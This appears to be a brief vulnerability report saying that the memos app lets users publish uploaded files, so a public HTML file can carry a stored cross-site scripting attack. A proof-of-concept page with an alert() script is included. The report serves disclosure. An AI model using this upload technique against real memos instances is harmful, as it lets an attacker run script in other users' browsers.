memos allow users to upload file and make it public to others. But if the file is html with below content, xss attack can happen.
// PoC.js
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script>
alert("warning");
</script>
</head>
<body>
</body>
</html>